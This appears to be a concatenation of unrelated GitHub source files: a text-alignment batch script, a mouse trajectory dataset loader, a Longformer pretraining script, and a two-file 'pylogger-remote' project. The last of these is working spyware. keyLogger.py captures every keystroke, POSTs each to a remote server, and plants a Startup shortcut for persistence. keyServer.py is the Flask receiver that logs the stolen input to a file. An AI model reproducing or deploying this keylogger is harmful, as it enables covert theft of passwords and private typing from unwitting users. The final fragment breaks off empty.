if tr["data_type"] == "s":
r = [(sid1, sent_dict[sid1], sid2, sent_dict[sid2])
for sid1, sid2 in plines]
elif tr["data_type"] == "sc":
if "common_char_count_th" in config:
CCCTH = int(config["common_char_count_th"])
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]啟用:common_char_count_th 設定:{}".format(trid, CCCTH))
else:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]找不到 common_char_count_th 設定,使用預設值:{}".format(trid, CCCTH))
if logLevel >= 3:
print(logMessages[-1])
r = [(sid1, s1[sid1], sid2, s2[sid2])
for sid1, sid2, ccc in plines if int(ccc) >= CCCTH]
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]共有{}筆 pair 資料".format(trid, len(r)))
if logLevel >= 3:
print(logMessages[-1])
elif (tr["data_type"] == "r"): # (o)ffset mode:
# pair 檔中紀錄為資料檔的offset 值
# datafile 內就是原卷大小,一整個檔。
if not ("pair_file" in tr):
raise SystemExit(
"Error: 11 Pair FILE ERROR: must set pair_file when data_type set to r. \n Occucrs in{}".format(tr))
if not ("text_file1" in tr):
raise SystemExit(
"Error: 14 text FILE ERROR: must set text_file1 when data_type set to r. \n Occucrs in{}".format(tr))
if not ("text_file2" in tr):
raise SystemExit(
"Error: 15 text FILE ERROR: must set text_file2 when data_type set to r. \n Occucrs in{}".format(tr))
if logLevel >= 3:
print(logMessages[-1])
text_file1 = os.path.join(file_base, tr["text_file1"])
text_file2 = os.path.join(file_base, tr["text_file2"])
pair_file = os.path.join(file_base, tr["pair_file"])
with open(text_file1, 'r') as tfile1, open(text_file2, 'r') as tfile2, open(pair_file, 'r') as pfile:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Text_file-1]讀取資料檔:{}".format(trid, text_file1))
text1 = tfile1.read().strip()
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Text_file-2]讀取資料檔:{}".format(trid, text_file2))
text2 = tfile2.read().strip()
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
for line in pfile:
fieds = line.strip().split("\t")
sid1F, sid1T = tuple(fieds[0].split("..")[:2])
sid2F, sid2T = tuple(fieds[1].split("..")[:2])
str1 = text1[int(sid1F):int(sid1T)+1]
str2 = text2[int(sid2F):int(sid2T)+1]
# print("{}:{}({}) - {}:{}({}) ".format(
# sid1F,sid1T,str1,
# sid2F,sid2T,str2))
r.append((fieds[0], str1, fieds[1], str2))
elif (tr["data_type"] == "t"): # (T)wo texts mode: 兩個文字檔,各自內含一句。
if not ("sent_file1" in tr):
raise SystemExit(
"Error: 12 Task FILE ERROR: must set sent_file1 when data_type set to t. \n Occucrs in{}".format(tr))
if not ("sent_file2" in tr):
raise SystemExit(
"Error: 13 Task FILE ERROR: must set sent_file2 when data_type set to t. \n Occucrs in{}".format(tr))
sent_file1 = os.path.join(file_base, tr["sent_file1"])
sent_file2 = os.path.join(file_base, tr["sent_file2"])
with open(sent_file1, 'r') as ifile1, open(sent_file2, 'r') as ifile2:
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#DataMode]資料模式:兩全文檔比對".format(trid))
logMessages.append("[#TID:{}][#PairFILE]Reading Files:\n [1] {} \n [2] {}".format(
trid, sent_file1, sent_file2))
if logLevel >= 3:
print("\n".join(logMessages[-2:]))
ref = ifile1.read().strip().split("\t")
qry = ifile2.read().strip().split("\t")
r.append((ref[0], ref[1], qry[0], qry[1]))
else:
raise SystemExit("Error: 1X unsupported data type:{}. \n Occucrs in{}".format(
tr["data_type"], tr))
return output_file, r, logMessages
# 多共用Task 處理函式
def processTask(taskobj):
#print("開始進行Task: {}/{}".format(i+1,len(tasks)))
trid = taskobj.task["task_id"] if "task_id" in taskobj.task else "Unknown"
logLevel = taskobj.logLevel
OUTPUT_filename, compareStringArray, logMessages = process_task_record(
taskobj.task, taskobj.config, logLevel)
print_to_file = True if OUTPUT_filename else False
if len(compareStringArray) == 0:
return
# if (print_to_file):
# print("開始執行比對:")
t1 = datetime.datetime.now()
# 進行資料比較
alignMessges = run_align_task(compareStringArray, taskobj.config,
taskobj.messageType, taskobj.variantMode,
taskobj.variantFile, print_to_file, batch_mode=True)
t2 = datetime.datetime.now()
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]執行完成,花費:{} 秒".format(trid, (t2-t1).seconds))
if logLevel >= 3:
print(logMessages[-1])
if (OUTPUT_filename):
# 確保有資料夾可以輸出
outdir = os.path.dirname(OUTPUT_filename)
Path(outdir).mkdir(parents=True, exist_ok=True)
if len(alignMessges) > 1: # 輸出結果, 1筆是檔頭
if logLevel >= 2:
logMessages.append("[#TID:{0}][#Output][#c:{2}]結果輸出於:{1}, 共{2}筆".format(
trid, OUTPUT_filename, len(alignMessges)-1))
with open(OUTPUT_filename, 'w') as ofile:
ofile.write("\r\n".join(alignMessges))
else: # 沒有結果, 不輸出
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Output][#c:0]沒有比對結果,不輸出。".format(trid))
return logMessages
# if ("log_file" in taskobj.config):
# logfile = open(os.path.join(".",taskobj.config["log_file"]),"a")
# logfile.write("\r\n".join(logMessages))
# logfile.write("\r\n")
# logfile.close()
def unissw_dila_main():
FILE_PATH = os.path.dirname(__file__)
task_file = None
config_file = "config.json"
# 重要的流程控制參數,與外來參數有關
OUTPUT_filename = None
variantMode = False # Ture/False 控制是否進行異體字比對
variantFile = os.path.join(FILE_PATH, "data", "variants.txt")
config_file = os.path.join(FILE_PATH, "config.json")
messageType = 1 # 1: 正式輸出, 2: Debug輸出 (可由command line 加上-d 來控制)
compareStringArray = [] # 紀錄用來的字串的Array
try:
opts, args = getopt.getopt(sys.argv[1:], "t:c:")
except getopt.GetoptError as err:
# print help information and exit:
usage()
sys.exit(2)
for opt, value in opts:
if "-c" in opt:
config_file = value
if "-t" in opt:
task_file = value
if not task_file:
print("You have to specify the path of the taskfile.")
usage()
exit()
elif not os.path.isfile(task_file):
print("Error: Task FILE ({}) does not exist.".format(task_file))
exit()
# 讀入 config檔
config = read_config(config_file)
if ("log_file" in config):
print("log將輸出於:{}".format(config["log_file"]))
# log_message_level = 0, 完全不顯示Log Message
# log_message_level = 1, 僅顯示總體訊息 (上有多少卷)
# log_message_level = 2,
# log_message_level = 3, 包含各卷比對細節 Default
if "log_message_level" in config:
logLevel = int(config["log_message_level"])
else:
logLevel = 3
# 讀入 task.json檔
task_json = []
with open(task_file, "r") as tfile:
task_json = json.load(tfile)
t0 = datetime.datetime.now()
# 準備工作項目
taskObjList = [TaskObj(config, messageType, variantMode,
variantFile, t, logLevel) for t in task_json]
# 進行多工設定
if ("num_of_max_process" in config):
pool = Pool(config["num_of_max_process"]) # Pool() 不放參數則默認使用電腦核的數量
else:
pool = Pool()
msg = "程式運行開始,全部共有:{} 比對工作待進行。".format(len(taskObjList))
print(msg)
if ("log_file" in config):
logfile = open(os.path.join(".", config["log_file"]), "w")
logfile.write("{}\r\n".format(msg))
logfile.close()
# 進行多工處理
task_done = 0
tx = datetime.datetime.now()
for msgs in pool.imap(processTask, taskObjList):
tr = taskObjList[task_done].task
trid = tr["task_id"] if "task_id" in tr else "Unknown"
now = datetime.datetime.now()
task_done += 1
if logLevel >= 1:
msgs.append("[#TID:{}][#TaskDone]已完成:{}/{} [Time:{}(秒)]".format(trid,
task_done, len(taskObjList), (now-tx).seconds))
print(msgs[-1])
if logLevel >= 2:
msgs.append("-"*60)
if logLevel >= 3:
print(msgs[-1])
if ("log_file" in config):
logfile = open(os.path.join(".", config["log_file"]), "a")
logfile.write("\r\n".join(msgs))
logfile.write("\r\n")
logfile.close()
tx = now
# for taskobj in taskObjList:
# processTask(taskobj)
t = datetime.datetime.now()
msg = "執行完成,全部花費:{} 秒".format((t-t0).seconds)
print(msg)
if ("log_file" in config):
logfile = open(os.path.join(".", config["log_file"]), "a")
logfile.write("{}\r\n".format(msg))
logfile.close()
if __name__ == '__main__':
unissw_dila_main()
```
|
{
"source": "jenjsun/calibratable-style-consistency",
"score": 2
}
|
#### File: datasets/mouse_v1/core.py
```python
import os
import numpy as np
import torch
from util.datasets import TrajectoryDataset
from .label_functions import label_functions_list
# TODO let users define where data lies
ROOT_DIR = 'util/datasets/mouse_v1/data'
TRAIN_FILE = 'train.npz'
TEST_FILE = 'test.npz'
FRAME_WIDTH_TOP = 1024
FRAME_HEIGHT_TOP = 570
class MouseV1Dataset(TrajectoryDataset):
name = 'mouse_v1'
all_label_functions = label_functions_list
# Default config
_seq_len = 100
_state_dim = 28
_action_dim = 28
normalize_data = True
single_agent = False
def __init__(self, data_config):
super().__init__(data_config)
def _load_data(self):
# Process configs
if 'normalize_data' in self.config:
self.normalize_data = self.config['normalize_data']
if 'single_agent' in self.config:
self.single_agent = self.config['single_agent']
# TODO hacky solution
if 'labels' in self.config:
for lf_config in self.config['labels']:
lf_config['data_normalized'] = self.normalize_data
self.train_states, self.train_actions = self._load_and_preprocess(train=True)
self.test_states, self.test_actions = self._load_and_preprocess(train=False)
def _load_and_preprocess(self, train):
path = os.path.join(ROOT_DIR, TRAIN_FILE if train else TEST_FILE)
file = np.load(path)
data = file['data']
# Subsample timesteps
data = data[:,::self.subsample]
# Normalize data
if self.normalize_data:
data = normalize(data)
# Convert to states and actions
states = data
actions = states[:,1:] - states[:,:-1]
# Update dimensions
self._seq_len = actions.shape[1]
self._state_dim = states.shape[-1]
self._action_dim = actions.shape[-1]
print(states.shape)
print(actions.shape)
return torch.Tensor(states), torch.Tensor(actions)
def save(self):
pass
def normalize(data):
"""Scale by dimensions of image and mean-shift to center of image."""
state_dim = data.shape[2]//2
shift = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
scale = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
return np.divide(data-shift, scale)
def unnormalize(data):
"""Undo normalize."""
state_dim = data.shape[2]//2
shift = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
scale = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
return np.multiply(data, scale) + shift
def _set_figax():
pass
```
#### File: mouse_v1/label_functions/heuristics.py
```python
import torch
import numpy as np
from util.datasets import LabelFunction
class AverageSpeed(LabelFunction):
name = 'average_speed'
def __init__(self, lf_config):
super().__init__(lf_config, output_dim=1)
def label_func(self, states, actions, true_label=None):
vel = actions.view(actions.size(0), -1, 2)
speed = torch.norm(vel, dim=-1)
avg_speed = torch.mean(speed, dim=0)
return torch.mean(avg_speed)
def plot(self, ax, states, label, width, length):
return ax
class NoseNoseDistance(LabelFunction):
name = 'nose_nose_distance'
def __init__(self, lf_config):
super().__init__(lf_config, output_dim=1)
def label_func(self, states, actions, true_label=None):
keypoints = states.view(states.size(0), 2, 7, 2)
nose_distance = torch.norm(
keypoints[:, 0, 0, :] - keypoints[:, 1, 0, :], dim=-1)
return torch.mean(nose_distance)
def plot(self, ax, states, label, width, length):
return ax
```
|
{
"source": "jenka13all/Master-Thesis-Multilingual-Longformer",
"score": 2
}
|
#### File: Master-Thesis-Multilingual-Longformer/scripts/run_long_lm.py
```python
import argparse
import copy
import datetime
from dataclasses import dataclass, field
import functools
import logging
import math
import os
import pickle
import re
import sys
import time
import threading
from typing import Optional
import torch
from torch.utils.data.dataset import Dataset
from torch.utils.tensorboard import SummaryWriter
import tqdm
from transformers import logging as hf_logging
from transformers.modeling_longformer import LongformerSelfAttention
from transformers import (
PreTrainedModel,
PreTrainedTokenizer,
AutoModelForMaskedLM,
RobertaForMaskedLM,
XLMRobertaForMaskedLM,
AutoTokenizer,
)
from transformers import (
HfArgumentParser,
DataCollatorForLanguageModeling,
Trainer,
TrainingArguments,
set_seed,
)
class color:
"""Help print colors to terminal."""
PURPLE = "\033[95m"
CYAN = "\033[96m"
DARKCYAN = "\033[36m"
BLUE = "\033[94m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
RED = "\033[91m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
END = "\033[0m"
def is_roberta_based_model(model_name: str) -> str:
"""Validate if the model to pre-train is of roberta architecture."""
r = re.compile('(.*)roberta(.*)')
matches = r.findall(model_name)
base_name = 'none'
if len(matches) > 0:
base_name = '-'.join(model_name.split('-')[:-1])
return base_name
##########################################
#
# Arguments
#
##########################################
"""Helper function: Define argparser and args."""
parser = argparse.ArgumentParser()
parser.add_argument(
"--model_name",
default=None,
type=str,
help="Name to save the model as.",
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
help="The output directory for the trained model.",
)
parser.add_argument(
"--model_type",
default=None,
type=str,
help="Model type selected in the list from Huggingface ex:"
" `bert, roberta, xlm-roberta, ...`",
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pretrained model from huggingface.co/models. "
"Only tested on `xlm-roberta-base` and `roberta-base`.",
)
parser.add_argument(
"--logging_dir",
default=None,
type=str,
help="Where logs are stored.",
)
parser.add_argument(
"--model_max_length",
default=4096,
type=int,
choices=[
512,
1024,
2048,
4096,
8192,
16384,
32768,
65536,
131072,
262144,
524288,
1048576,
],
help="The maxiumum position of the model",
)
parser.add_argument(
"--attention_window",
default=512,
type=int,
help="Size of attention window",
)
parser.add_argument(
"--evaluation_strategy",
default="no",
type=str,
help="How evaluation should be logged, 'steps', 'epochs', 'no'.",
)
parser.add_argument(
"--do_train",
action="store_true",
help="Whether to run training."
)
parser.add_argument(
"--do_eval",
action="store_true",
help="Whether to run eval on the dev set."
)
parser.add_argument(
"--per_device_train_batch_size",
default=8,
type=int,
help="Batch size per GPU/CPU for training.",
)
parser.add_argument(
"--per_device_eval_batch_size",
default=8,
type=int,
help="Batch size per GPU/CPU for evaluation.",
)
parser.add_argument(
"--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of gradient updates to perform before updating the weights",
)
parser.add_argument(
"--weight_decay",
default=0.0,
type=float,
help="Weight decay if we apply some."
)
parser.add_argument(
"--adam_epsilon",
default=1e-8,
type=float,
help="Epsilon for Adam optimizer."
)
parser.add_argument(
"--max_grad_norm", default=1.0, type=float, help="Max gradient norm."
)
parser.add_argument(
"--num_train_epochs",
default=3.0,
type=float,
help="Total number of training epochs to perform.",
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. "
"Override num_train_epochs.",
)
parser.add_argument(
"--warmup_steps",
default=0,
type=int,
help="Linear warmup over warmup_steps."
)
parser.add_argument(
"--verbose_logging",
action="store_true",
help="If true, log all information when loading datasets.",
)
parser.add_argument(
"--cache_dir",
default=None,
help="Where do you want to store the pretrained models.",
)
parser.add_argument(
"--lang_id",
default=0,
type=int,
help="language id of input for language-specific xlm models "
"(see tokenization_xlm.PRETRAINED_INIT_CONFIGURATION)",
)
parser.add_argument(
"--logging_steps",
type=int,
default=500,
help="Log every X updates steps."
)
parser.add_argument(
"--save_steps",
type=int,
default=500,
help="Save checkpoint every X updates steps.",
)
parser.add_argument(
"--eval_all_checkpoints",
action="store_true",
help="Evaluate all checkpoints starting with the same prefix as model_name"
"ending and ending with step number",
)
parser.add_argument(
"--overwrite_output_dir",
action="store_true",
help="Overwrite the content of the output directory",
)
parser.add_argument(
"--seed",
type=int,
default=42,
help="random seed for initialization"
)
parser.add_argument(
"--local_rank",
type=int,
default=-1,
help="local_rank for distributed training on gpus",
)
parser.add_argument(
"--fp16",
action="store_true",
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex)",
)
parser.add_argument(
"--fp16_opt_level",
type=str,
default="O1",
help="For fp16: Apex AMP optimization level selected in"
"['O0', 'O1', 'O2', and 'O3'].",
)
parser.add_argument(
"--train_file_path",
type=str,
default="/workspace/data/wikitext-103/wiki.train.raw",
help="File path to language model training file",
)
parser.add_argument(
"--val_file_path",
type=str,
default="/workspace/data/wikitext-103/wiki.valid.raw",
help="File path to language model validation file",
)
parser.add_argument(
"--eval_steps",
type=int,
default=None,
help="Number of evaluation steps",
)
parser.add_argument(
"--prediction_loss_only",
action="store_true",
help="Prediction loss only",
)
args = parser.parse_args()
hf_logging.enable_default_handler()
hf_logging.set_verbosity_info()
hf_logging.enable_explicit_format()
tb_writer = SummaryWriter(log_dir=args.logging_dir)
logger = logging.getLogger("")
logger.setLevel(logging.INFO)
fh = logging.FileHandler(f"{args.logging_dir}.log")
sh = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(
"[%(asctime)s], %(levelname)s %(message)s",
datefmt="%a, %d %b %Y %H:%M:%S",
)
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info("\n --> Starting logger:\n" + "=" * 55 + "\n")
logger.warning(
f"Process rank: {args.local_rank}, \
distributed training: {bool(args.local_rank != -1)}, \
16-bits training: {args.fp16}"
)
##########################################
#
# Replace Huggingface - TextDataset
#
##########################################
# https://github.com/tqdm/tqdm/issues/458
def provide_progress_bar(
function, estimated_time, tstep=0.2, tqdm_kwargs={}, args=[], kwargs={}
):
ret = [None] # Mutable var so the function can store its return value
def myrunner(function, ret, *args, **kwargs):
ret[0] = function(*args, **kwargs)
thread = threading.Thread(
target=myrunner, args=(function, ret) + tuple(args), kwargs=kwargs
)
pbar = tqdm.tqdm(total=estimated_time, **tqdm_kwargs)
thread.start()
while thread.is_alive():
thread.join(timeout=tstep)
pbar.update(tstep)
pbar.close()
return ret[0]
def progress_wrapped(estimated_time, tstep=0.2, tqdm_kwargs={}):
def real_decorator(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
return provide_progress_bar(
function,
estimated_time=estimated_time,
tstep=tstep,
tqdm_kwargs=tqdm_kwargs,
args=args,
kwargs=kwargs,
)
return wrapper
return real_decorator
class TextDataset(Dataset):
# Ugly HACK on older transformers
# Use same code as Huggingface TextDataset
def __init__(
self,
tokenizer: PreTrainedTokenizer,
file_path: str,
block_size: int,
overwrite_cache=False,
cache_dir: Optional[str] = None,
):
assert os.path.isfile(
file_path), f"Input file path {file_path} not found"
block_size = block_size - \
tokenizer.num_special_tokens_to_add(pair=False)
directory, filename = os.path.split(file_path)
cached_features_file = os.path.join(
cache_dir if cache_dir is not None else directory,
"cached_lm_{}_{}_{}".format(
tokenizer.__class__.__name__,
str(block_size),
filename,
),
)
# Make sure only the first process in distributed training processes the dataset,
# and the others will use the cache.
@progress_wrapped(estimated_time=200)
def tokenize_text(text):
return tokenizer.tokenize(text)
@progress_wrapped(estimated_time=300)
def convert_tokens_to_ids(tokenized_text):
return tokenizer.convert_tokens_to_ids(tokenized_text)
if os.path.exists(cached_features_file) and not overwrite_cache:
start = time.time()
with open(cached_features_file, "rb") as handle:
self.examples = pickle.load(handle)
logger.info(
f"Loading features from cached file {cached_features_file} [took %.3f s]",
time.time() - start,
)
else:
logger.info(
f"Creating features from dataset file at {directory}\n\n")
self.examples = []
with open(file_path, encoding="utf-8") as f:
text = f.read()
# For large texts and models, this could take a long time
# Done i two steps, since each part can take between 5-10 min
start = time.time()
text = tokenize_text(text)
logger.info("Tokenizing text [took %.3f s]", time.time() - start)
start = time.time()
tokenized_text = convert_tokens_to_ids(text)
logger.info(
"Converting text to id [took %.3f s]\n", time.time() - start)
start = time.time()
for i in range(
0, len(tokenized_text) - block_size + 1, block_size
): # Truncate in block of block_size
self.examples.append(
tokenizer.build_inputs_with_special_tokens(
tokenized_text[i: i + block_size]
)
)
logger.info(
"Build tokenizer inputs by block_size length [took %.3f s]",
time.time() - start,
)
start = time.time()
with open(cached_features_file, "wb") as handle:
pickle.dump(self.examples, handle,
protocol=pickle.HIGHEST_PROTOCOL)
logger.info(
"Saving features into cached file %s [took %.3f s]",
cached_features_file,
time.time() - start,
)
def __len__(self):
return len(self.examples)
def __getitem__(self, i) -> torch.Tensor:
return torch.tensor(self.examples[i], dtype=torch.long)
###########################################################
#
# Longformer conversion
#
###########################################################
# TODO: Huggingface transformers v. >3.5.1 breaks this
class LongModelSelfAttention(LongformerSelfAttention):
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
print()
return super().forward(
hidden_states,
attention_mask=attention_mask,
)
# Load initial model
MODEL: PreTrainedModel
if is_roberta_based_model(args.model_name_or_path) == "xlm-roberta":
MODEL = XLMRobertaForMaskedLM
elif is_roberta_based_model(args.model_name_or_path) == "roberta":
MODEL = RobertaForMaskedLM
else:
raise NotImplementedError("Currently only supports roberta-based architectures.")
class LongModelForMaskedLM(MODEL):
def __init__(self, config):
super().__init__(config)
#print(f"\n{color.YELLOW}Converting models to Longformer is currently only tested for RoBERTa like architectures.{color.END}")
for i, layer in enumerate(self.roberta.encoder.layer):
layer.attention.self = LongModelSelfAttention(config, layer_id=i)
def create_long_model(
save_model_to,
model,
tokenizer,
attention_window,
model_max_length
):
config = model.config
position_embeddings = model.roberta.embeddings.position_embeddings
tokenizer.model_max_length = model_max_length
tokenizer.init_kwargs['model_max_length'] = model_max_length
current_model_max_length, embed_size = position_embeddings.weight.shape
# NOTE: RoBERTa has positions 0,1 reserved
# embedding size is max position + 2
model_max_length += 2
config.max_position_embeddings = model_max_length
assert model_max_length > current_model_max_length, \
"New model max_length must be longer than current max_length"
# BUG for XLM: Need to make all zeros since too large base model
new_pos_embed = position_embeddings.weight.new_zeros(
model_max_length, embed_size
)
k = 2
step = current_model_max_length - 2
while k < model_max_length - 1:
new_pos_embed[k:(
k + step)] = position_embeddings.weight[2:]
k += step
# HACK for Huggingface transformers >=3.4.0 and < 4.0
# https://github.com/huggingface/transformers/issues/6465#issuecomment-719042969
position_embeddings.weight.data = new_pos_embed
model.roberta.embeddings.position_embeddings.num_embeddings = len(
new_pos_embed.data
)
num_model_embeddings = position_embeddings.num_embeddings
model.roberta.embeddings.position_ids = torch.arange(
0, num_model_embeddings
)[None]
# replace the `modeling_bert.BertSelfAttention` object with `LongformerSelfAttention`
config.attention_window = [attention_window] * config.num_hidden_layers
for i, layer in enumerate(model.roberta.encoder.layer):
longformer_self_attn = LongformerSelfAttention(config, layer_id=i)
longformer_self_attn.query = layer.attention.self.query
longformer_self_attn.key = layer.attention.self.key
longformer_self_attn.value = layer.attention.self.value
#allenai
longformer_self_attn.query_global = copy.deepcopy(layer.attention.self.query)
longformer_self_attn.key_global = copy.deepcopy(layer.attention.self.key)
longformer_self_attn.value_global = copy.deepcopy(layer.attention.self.value)
#longformer_self_attn.query_global = layer.attention.self.query
#longformer_self_attn.key_global = layer.attention.self.key
#longformer_self_attn.value_global = layer.attention.self.value
layer.attention.self = longformer_self_attn
logger.info(f'saving model to {save_model_to}')
model.save_pretrained(save_model_to)
tokenizer.save_pretrained(save_model_to)
return model, tokenizer
#allenai
def copy_proj_layers(model):
for i, layer in enumerate(model.roberta.encoder.layer):
layer.attention.self.query_global = copy.deepcopy(layer.attention.self.query)
layer.attention.self.key_global = copy.deepcopy(layer.attention.self.key)
layer.attention.self.value_global = copy.deepcopy(layer.attention.self.value)
return model
#def copy_proj_layers(model):
# for _, layer in enumerate(model.roberta.encoder.layer):
# layer.attention.self.query_global = layer.attention.self.query
# layer.attention.self.key_global = layer.attention.self.key
# layer.attention.self.value_global = layer.attention.self.value
# return model
def pretrain_and_evaluate(
training_args, data_args, model, tokenizer, eval_only, model_path
):
val_dataset = TextDataset(
tokenizer=tokenizer,
file_path=data_args.val_file_path,
block_size=tokenizer.max_len,
)
if eval_only:
train_dataset = val_dataset
else:
logger.info(
f"Loading and tokenizing training data is usually slow: {data_args.train_file_path}"
)
train_dataset = TextDataset(
tokenizer=tokenizer,
file_path=data_args.train_file_path,
block_size=tokenizer.max_len,
)
data_collator = DataCollatorForLanguageModeling(
tokenizer=tokenizer, mlm=True, mlm_probability=0.15
)
trainer = Trainer(
model=model,
args=training_args,
data_collator=data_collator,
train_dataset=train_dataset,
eval_dataset=val_dataset,
#deprecated as a keyword argument: move into args.prediction_los_only
#prediction_loss_only=True,
)
eval_loss = trainer.evaluate()
eval_loss = eval_loss["eval_loss"]
print(f"Initial eval bpc: {color.GREEN}{eval_loss/math.log(2)}{color.END}")
logger.info(f"Initial eval bpc: {eval_loss/math.log(2)}")
if not eval_only:
trainer.train(model_path=model_path)
trainer.save_model()
eval_loss = trainer.evaluate()
eval_loss = eval_loss["eval_loss"]
print(
f"Eval bpc after pretraining: \
{color.GREEN}{eval_loss/math.log(2)}{color.END}"
)
logger.info(f"Eval bpc after pretraining: {eval_loss/math.log(2)}")
@dataclass
class ModelArguments:
"""Huggingface parameters for the model training."""
model_name_or_path: str = field(
default=None,
metadata={
"help": "Name of pretrained model to load for model and tokenizer"
", based on huggingface.co/models, ex 'roberta-base'"
},
)
model_name: str = field(
default="roberta-base-long-4096-lm",
metadata={"help": "Name to use when saving model."},
)
attention_window: int = field(
default=512,
metadata={"help": "Size of attention window"}
)
model_max_length: int = field(
default=4096,
metadata={"help": "Maximum position"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={
"help": "Where do you want to store the pretrained models."
},
)
@dataclass
class DataTrainingArguments:
"""Training and validation data arguments."""
val_file_path: str = field(
default="/workspace/data/wikitext-103-raw/wiki.valid.raw",
metadata={"help": "File for training a Language Model"},
)
train_file_path: str = field(
default="/workspace/data/wikitext-103-raw/wiki.train.raw",
metadata={"help": "File for evaluating a Language Model"},
)
def main():
############################################
#
# Define model params
#
############################################
parser = HfArgumentParser(
(ModelArguments, DataTrainingArguments, TrainingArguments)
)
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
print('training_args: ')
print(training_args)
print('training_args n_gpu, device:')
print(training_args.n_gpu)
print(training_args.device)
set_seed(training_args.seed)
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) \
already exists and is not empty.\
Use --overwrite_output_dir to overcome."
)
###########################################
#
# RUN
#
###########################################
start = time.time()
print("---------------------------------------------------------")
print(
f"\nLoading from Huggingface pretrained model: \
`{color.BOLD}{color.GREEN}\
{model_args.model_name_or_path}\
{color.END}{color.END}` \
with name: {model_args.model_name}\n"
)
model = AutoModelForMaskedLM.from_pretrained(
model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.model_name_or_path,
model_max_length=model_args.model_max_length,
cache_dir=model_args.cache_dir,
use_fast=True,
)
print(f"{color.RED}Creating Longformer model{color.END}")
model_path = training_args.output_dir
if not os.path.exists(model_path):
os.makedirs(model_path)
logger.info(
f"Converting {model_args.model_name_or_path} \
into {model_args.model_name}"
)
model, tokenizer = create_long_model(
save_model_to=model_path,
model=model,
tokenizer=tokenizer,
attention_window=model_args.attention_window,
model_max_length=model_args.model_max_length,
)
print(f"{color.RED}Loading Model{color.END}")
logger.info(f"Loading the model from {model_path}")
model = LongModelForMaskedLM.from_pretrained(model_path)
tokenizer = AutoTokenizer.from_pretrained(
model_path,
model_max_length=model_args.model_max_length,
use_fast=True
)
print(f"{color.RED}Evaluate{color.END}")
logger.info(
f"Pretraining \
{model_args.model_name_or_path}-{model_args.model_max_length}... "
)
pretrain_and_evaluate(
training_args,
data_args,
model,
tokenizer,
eval_only=False,
model_path=training_args.output_dir,
)
print(
f"{color.PURPLE}TIME elapsed{color.END}: {datetime.datetime.fromtimestamp(time.time()-start).strftime('%d days, %H:%M:%S')}"
)
logger.info(
"Copying local projection layers into global projection layers..."
)
model = copy_proj_layers(model)
logger.info(f"Saving model to {model_path}")
model.save_pretrained(model_path)
print(f"{color.RED}Loading Done model{color.END}")
logger.info(f"Loading the model from {model_path}")
model = LongModelForMaskedLM.from_pretrained(model_path)
tokenizer = AutoTokenizer.from_pretrained(model_path)
if __name__ == "__main__":
main()
```
|
{
"source": "jenkatuwal/pylogger-remote",
"score": 3
}
|
#### File: jenkatuwal/pylogger-remote/keyLogger.py
```python
import os
import pathlib
import winshell
import win32com.client
from datetime import datetime
import pynput
import requests
def init():
new_kl = KeyListener()
new_kl.first_run()
new_kl.run()
class KeyListener:
def __init__(self):
self.serverName = ""
self.serverPort = ""
self.program_name = ""
def on_press(self, key):
current_time_formatted = datetime.now().strftime("%Y-%m-%d : %H:%M:%S")
prepared_key = "[%s]: %s pressed" % (current_time_formatted, key)
prepared_obj = {"Body": prepared_key}
requests.post("%s:%s" % (self.serverName, self.serverPort), data=prepared_obj)
def first_run(self):
shortcut_name = self.program_name + ".lnk"
file_list = os.listdir(winshell.startup())
if shortcut_name in file_list:
return False
else:
# Get current dir, and append it to target file path
current_dir_path = pathlib.Path(pathlib.Path().resolve())
target_file_path = os.path.join(current_dir_path, "%s.exe" % self.program_name)
# Get startup file path, and add .lnk file to it
startup = pathlib.Path(winshell.startup())
path = os.path.join(startup, '%s.lnk' % self.program_name)
# Get shell to create a shortcut to the desired path
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(path)
# Add path and icon to the location
shortcut.Targetpath = target_file_path
shortcut.IconLocation = target_file_path
shortcut.save()
def run(self):
with pynput.keyboard.Listener(on_press=self.on_press) as listener:
listener.join()
if __name__ == '__main__':
init()
```
#### File: jenkatuwal/pylogger-remote/keyServer.py
```python
from flask import Flask
from flask import request
keyServer = Flask(__name__)
def file_write(prepstr):
f = open("kl.txt", "a")
f.write(prepstr + "\n")
@keyServer.route("/", methods=["POST"])
def keyAction():
body = request.values.get("Body")
print(body)
file_write(body)
return "Received"
if __name__ == '__main__':
# Change the port to a port that has been port forwarded (i.e. 25564)
keyServer.run(host="0.0.0.0", port=00000, debug=True)
```
|
{
"source": "jenkayco/hacknostics",
"score": 4
}
|
#### File: Examples/scripts/bar_1.py
```python
